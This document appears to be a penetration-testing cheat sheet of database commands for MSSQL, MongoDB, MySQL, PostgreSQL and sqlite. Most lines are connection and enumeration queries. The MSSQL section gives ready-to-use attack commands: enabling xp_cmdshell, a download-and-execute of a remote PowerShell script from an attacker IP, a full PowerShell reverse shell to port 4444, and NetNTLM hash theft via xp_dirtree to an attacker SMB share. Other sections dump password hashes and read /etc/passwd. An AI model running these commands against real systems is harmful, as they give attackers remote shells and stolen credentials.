Database Analysis
impacket-mssqlclient
Connection
impacket-mssqlclient <USERNAME>@<RHOST>
impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth
impacket-mssqlclient -k -no-pass <RHOST>
impacket-mssqlclient <DOMAIN>/<USERNAME>:<PASSWORD>@<RHOST> -windows-auth
export KRB5CCNAME=<USERNAME>.ccache
impacket-mssqlclient -k <RHOST>.<DOMAIN>
Common Commands
enum_logins
enum_impersonate
MongoDB
mongo "mongodb://localhost:27017"
> use <DATABASE>;
> show tables;
> show collections;
> db.system.keys.find();
> db.users.find();
> db.getUsers();
> db.getUsers({showCredentials: true});
> db.accounts.find();
> db.accounts.find().pretty();
> use admin;
MSSQL
Connection
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>'
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>' -Q "<mssql query>"
impacket-mssqlclient <USERNAME>:<PASSWORD>@<RHOST> -windows-auth
Common Commands
SELECT @@version;
-- List databases
SELECT name FROM master..sysdatabases;
SELECT name FROM master.sys.databases;
-- Use a database
USE <database>
-- List tables
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM <DBNAME>..sysobjects WHERE xtype='U'
-- List columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
-- Concatenation
SELECT user +':'+ password from Users
-- Select a table from a specific database
USE <database>; SELECT * from Users
Check privileges
SELECT IS_SRVROLEMEMBER('sysadmin')
Enable xp_cmdshell (requires sysadmin privileges)
enable_xp_cmdshell
To establish a reverse shell (rev.ps1 is a Nishang reverse shell script):
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.8.6.125/rev.ps1") | powershell -noprofile'
EXEC xp_cmdshell 'powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TCPClient(''10.8.6.125'',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1 | Out-String );$r2=$r+''PS ''+$env:COMPUTERNAME+''> ''; $s.Write(([text.encoding]::ASCII).GetBytes($r2),0,$r2.Length)}"'
Steal NetNTLM Hash / Relay Attack (Without elevated privileges)
Even if we can't execute commands using xp_cmdshell, we can still capture the NetNTLM hash of the SQL Server service account by making it access a UNC path via xp_dirtree or xp_fileexist.
exec xp_dirtree '\\<ip>\smbFolder\file'
Then capture the hash with the SMB server:
impacket-smbserver smbFolder $(pwd) -smb2support
MySQL
Connection
mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -p
Common commands
mysql> STATUS;
mysql> SHOW databases;
mysql> USE <DATABASE>;
mysql> SHOW tables;
mysql> DESCRIBE <TABLE>;
mysql> SELECT version();
mysql> SELECT system_user();
mysql> SELECT * FROM Users;
mysql> SELECT * FROM users \G;
mysql> SELECT Username,Password FROM Users;
mysql> SELECT user, authentication_string FROM mysql.user WHERE user = '<USERNAME>';
mysql> SELECT LOAD_FILE('/etc/passwd');
mysql> SELECT LOAD_FILE('C:\\PATH\\TO\\FILE\\<FILE>');
mysql> SHOW GRANTS FOR '<USERNAME>'@'localhost' \G;
PostgreSQL
psql
psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
Common Commands
postgres=# \list // list all databases
postgres=# \c // use database
postgres=# \c <DATABASE> // use specific database
postgres=# \s // command history
postgres=# \q // quit
<DATABASE>=# \dt // list tables from current schema
<DATABASE>=# \dt *.* // list tables from all schemas
<DATABASE>=# \du // list user roles
<DATABASE>=# \du+ // list user roles with extra details
<DATABASE>=# SELECT user; // get current user
<DATABASE>=# TABLE <TABLE>; // show all rows of a table
<DATABASE>=# SELECT * FROM users; // select everything from users table
<DATABASE>=# SHOW rds.extensions; // list available extensions (AWS RDS-specific parameter)
<DATABASE>=# SELECT usename, passwd from pg_shadow; // read credentials (password hashes; requires superuser)
sqlite3
sqlite3 <FILE>.db
sqlite> .tables
sqlite> PRAGMA table_info(<TABLE>);
sqlite> SELECT * FROM <TABLE>;